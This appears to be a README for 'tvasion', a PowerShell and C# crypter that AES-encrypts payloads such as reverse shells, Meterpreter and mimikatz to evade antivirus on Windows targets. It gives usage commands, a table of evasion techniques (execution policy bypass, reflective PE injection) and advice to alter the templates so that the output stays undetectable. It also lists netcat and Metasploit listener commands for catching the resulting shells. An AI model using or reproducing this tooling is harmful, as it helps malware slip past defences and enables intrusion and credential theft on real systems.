:performing_arts: Anti virus evasion based on file signature change via AES encryption with Powershell and C# AV evasion templates which support executable and Powershell payloads with Windows executable, Powershell or batch output. Developed with Powershell on Linux for Windows targets :)
Anti virus evasion based on file signature change via AES encryption with Powershell and C# AV evasion templates which support executable and Powershell payloads with Windows executable, Powershell or batch output. Developed with Powershell on Linux for Windows targets :)
Buzzwords: Anti virus evasion, AV evasion, crypter, AES encryption, ReflectivePEInjection, PowerShell execution policy bypass
https://github.com/loadenmb/tvasion
./tvasion.ps1 -h
tvasion: AES based anti virus evasion
./tvasion.ps1 -t (exe|bat|ps1|b64ps1|b64) [PAYLOAD (exe|ps1)] OR ./tvasion.ps1 [PAYLOAD (exe|ps1)] -t (exe|bat|ps1|b64ps1|b64)
parameter:
[PAYLOAD (exe|ps1)] input file path. requires: exe, ps1 required
-t (exe|ps1|bat|b64ps1|b64) output file type: exe, ps1, bat, b64ps1, b64 required
-i (PATH) path to icon. requires: .exe output (-t exe) optional
-f (PATH) path to template optional
-o (PATH) set output directory. default is ./out/ optional
-d generate debug output optional
-h display this help optional
examples:
./tvasion.ps1 -t exe tests/ReverseShell.ps1 # generate windows executable (.exe) from powershell
./tvasion.ps1 -t exe out/Meterpreter_amd64.exe -i tests/ghost.ico # generate windows executable (.exe) from executable, custom icon (-i)
./tvasion.ps1 -t bat tests/ReverseShell.ps1 # generate batch (.bat) from powershell
./tvasion.ps1 -t ps1 out/Meterpreter_amd64.exe -f mytpl1.ps1 -o ../ -d # ... .exe -> .ps1, custom template (-f), out dir (-o), debug (-d)
Files generated in ./out directory See more examples in: test file
Depencies:
# setup Powershell for Linux. see link above, be root
# install compiler depencies (optional, required for executable output)
apt-get install -y mono-mcs
# clone with git
git clone https://github.com/loadenmb/tvasion.git
Change AES decryption template source code to make sure evasion output is undetectable by anti virus solutions.
C# and powershell templates from ./templates/ directory basically do:
decode -> decrypt -> launch payload
It's input / output type dependent which template needs changes. See here:
payload type | output type | template from ./templates/ folder | details |
---|---|---|---|
powershell | powershell | default.ps1 | Invoke-Expression |
executable | powershell | default_exe.ps1 | Invoke-Expression + ReflectivePEInjection (*1) |
executable | executable | default_exe.cs | PEInjection (*1) |
powershell | executable | default.cs | PowerShell execution policy bypass with -Enc (*2) |
powershell | batch | default_bat.ps1 + default.bat | PowerShell execution policy bypass with -C + Invoke-Expression |
executable | batch | default_exe_bat.ps1 + default.bat | PowerShell execution policy bypass with -C + Invoke-Expression + ReflectivePEInjection (*1) |
powershell | base64 powershell | default.ps1 | Invoke-Expression |
executable | base64 powershell | default_exe.ps1 | Invoke-Expression + ReflectivePEInjection (*1) |
(*1) not all binaries work; Meterpreter, mimikatz work. See DEP, ASLR, and what to do against.
(*2) payload size restriction of arguments length of process.startupinfo.arguments see TODO
./templates/lib/ contain helper which get encrypted together with payload. You do not need to care about these files for a successful AV evasion.
Payload is created by tvasion.ps1 like this:
-> gzip compression -> base64 encoding -> pasted & compiled into C# dotnet assembly -> AES encryption -> base64 encoding -> pasted & compiled into C# windows executeable (.exe -> .exe)
payload -> AES encryption -> base64 encoding
-> pasted into powershell script (.ps1 -> .ps1)
-> base64 encoding
-> pasted & compiled into C# windows executeable (.ps1 -> .exe)
-> pasted into batch file (.ps1 | .exe -> .bat)
Option | Explanation |
---|---|
-t b64ps1 | base64 encoded AES encrypted powershell output. "base64 powershell" @ template table |
-t b64 | plain base64 encoded output (encoding only) |
For more options see:
./tvasion.ps1 -h
Powershell reverse shell is included in ./tests/ folder for testing purposes.
Run tests:
# listen for reverse shell connections from ./tests/ReverseShell.ps1
nc -nvlp 4242
# use msfconsole you opened in other terminal, we need this launched before to generate Meterpreter in ./tests.ps1
# listen with metasploit multi handler for windows/meterpreter/reverse_tcp on port 4444 (tests.ps1 generated Meterpreter will connect this port)
cd ./tvasion/tests/
msfconsole
resource msf_multihandler.rc
Discuss features, report issues, questions -> here.
Developer -> fork & pull ;)